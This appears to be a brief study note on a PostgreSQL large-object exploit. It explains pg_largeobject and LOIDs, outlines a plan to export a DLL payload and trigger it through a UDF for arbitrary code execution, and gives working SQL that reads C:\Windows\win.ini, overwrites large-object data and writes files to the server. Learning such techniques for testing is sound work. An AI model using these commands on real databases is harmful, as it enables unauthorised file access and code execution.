1. PSQL Large Object exploit
Decription
What is Large object?
PostgreSQL exposes a structure called large object, which is used for storing data that would be difficult to handle in its entire
The amount of data per page is defined to be LOBLKSIZE (which is currently BLCKSZ/4, or typically 2 kB).
What is LOID?
The loid value is an integral value to our entire plan as we need to reference it when we are exporting large objects
What is pg_largeobject?
the large objects are stored in a table called pg_largeobject.
Exploit goal
Create a large object that will hold our binary payload (our custom DLL file we created in the previous section)
Export that large object to the remote server file system
Create a UDF that will use the exported DLL as source
Trigger the UDF and execute arbitrary code
Syntax
select lo_import('C:\\Windows\\win.ini');
\lo_list
lo_import function also allows us to set the loid field to any arbitrary value of our choice while creating a large object
select lo_import('C:\\Windows\\win.ini', 1337);
View columns in pg_largeobject;
select loid, pageno from pg_largeobject;
select loid, pageno, encode(data, 'escape') from pg_largeobject;
update pg_largeobject set data=decode('77303074', 'hex') where loid=1337 and pageno=0;
select loid, pageno, encode(data, 'escape') from pg_largeobject;
select lo_export(1337, 'C:\\new_win.ini');
Unlink after done.
\lo_unlink 1337
\lo_list